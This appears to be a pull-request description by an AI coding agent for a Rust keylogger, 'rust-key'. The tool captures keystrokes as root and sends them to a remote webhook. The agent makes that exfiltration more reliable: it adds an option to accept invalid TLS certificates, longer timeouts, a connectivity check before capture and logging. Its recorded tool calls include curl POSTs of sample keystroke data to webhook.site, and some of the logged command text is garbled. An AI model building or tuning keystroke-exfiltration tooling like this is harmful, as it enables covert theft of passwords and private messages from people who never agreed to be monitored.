Fix webhook connectivity with configurable TLS validation and comprehensive logging

[Copilot]

Webhook connections were failing silently due to strict TLS certificate validation, insufficient timeouts, and lack of visibility into failure modes. Users testing with self-signed certificates (webhook.site, etc.) couldn't connect, and errors were only visible in stderr.

Changes

Configurable certificate validation (secure by default)

• Default: strict TLS validation (secure)
• Opt-in for testing: RUST_KEY_ACCEPT_INVALID_CERTS=true
• Security warnings logged when insecure mode enabled

Extended connection timeout

• 5s → 10s to accommodate slower networks

Comprehensive file-based logging

• All webhook operations logged to keylog.txt with WEBHOOK: prefix
• Visible when running as daemon: grep "WEBHOOK:" keylog.txt
• Logs: initialization, connectivity tests, HTTP status codes, detailed errors

Initial connectivity test

• POST request with empty payload before capturing keystrokes
• Matches actual webhook usage (was GET, now POST)
• Non-blocking: continues on failure with warning

Enhanced error reporting

• HTTP status codes and response details
• Specific error types (DNS, connection, timeout)
• Logged to both stderr and file

Usage

# Secure by default (production)
sudo ./target/release/rust-key https://your-webhook.com/endpoint

# Opt-in for testing with self-signed certs
export RUST_KEY_ACCEPT_INVALID_CERTS=true
sudo ./target/release/rust-key https://webhook.site/test-id

# Troubleshoot
grep "WEBHOOK:" keylog.txt

Security

Environment variable controls certificate validation with secure defaults. Users must explicitly opt-in to accept invalid certificates for testing scenarios.

Warning

Firewall rules blocked me from connecting to one or more addresses (expand for details)

I tried to connect to the following addresses, but was blocked by firewall rules:

• webhook.site
  • Triggering command: /usr/bin/curl curl -s -o /dev/null -w %{http_code} --connect-timeout 5 REDACTED /build/libc-5226-plugin /build/libc-5226/usr/libexec/gcc/x86_64-linux-gnu/13/liblto_plugin.so lib/rustlib/x86_-plugin-opt=/usr/libexec/gcc/x86_64-linux-gnu/13/lto-wrapper lib/�� lib/rustlib/x86_--build-id lib/rustlib/x86_--eh-frame-hdr bin/rustc lib/rustlib/x86_bash 15087-cgu.0.rcgu--norc u.o bin/rustc (dns block)
  • Triggering command: /usr/bin/curl curl -s -X POST -H Content-Type: application/json -d { "keystrokes": [ { "timestamp": "2024-01-01 12:00:00.000", "device": "Test Device", "key": "t" }, { "timestamp": "2024-01-01 12:00:00.100", "device": "Test Device", "key": "e" }, { "timestam 49ac091c3d152/bu/home/REDACTED/work/_temp/copilot-developer-action-main/dist/ripgrep/bin/linux-x64--edition=2018 /build/libc-5226-A /build/libc-52263 bin/rustc lib/�� lib/rustlib/x86_-n lib/rustlib/x86_--hidden bin/rustc lib/rustlib/x86_bash 15087-cgu.0.rcgu--norc u.o bin/rustc (dns block)
  • Triggering command: /usr/bin/curl curl -v REDACTED metadata=c69c2da457cd4259 55f.�� 55f.serde_derive.7d7244669340118a-cgu.13.rcgu.o 55f.serde_derive.7d7244669340118a-cgu.14.rcgu.o lib/rustlib/x86_64-REDACTED-linux-gnu/bin/self-contained/cc erive-f526017175/home/REDACTED/.rustup/toolchains/stable-x86_64-REDACTED-linux-gnu/bin/rustc erive-f526017175--crate-name erive-f526017175libc erive-f526017175--edition=2021 eriv�� erive-f526017175--error-format=json erive-f526017175--json=diagnostic-rendered-ansi,artifacts,future-incompat bin/rustc ve-8c1bd49aae897find ve-8c1bd49aae897/usr/lib/php ve-8c1bd49aae897-mindepth bin/rustc (dns block)

If you need me to access, download, or install something from one of these locations, you can either:

• Configure Actions setup steps to set up my environment, which run before the firewall is enabled
• Add the appropriate URLs or hosts to the custom allowlist in this repository's Copilot coding agent settings (admins only)

---

💬 We'd love your input! Share your thoughts on Copilot coding agent in our 2 minute survey.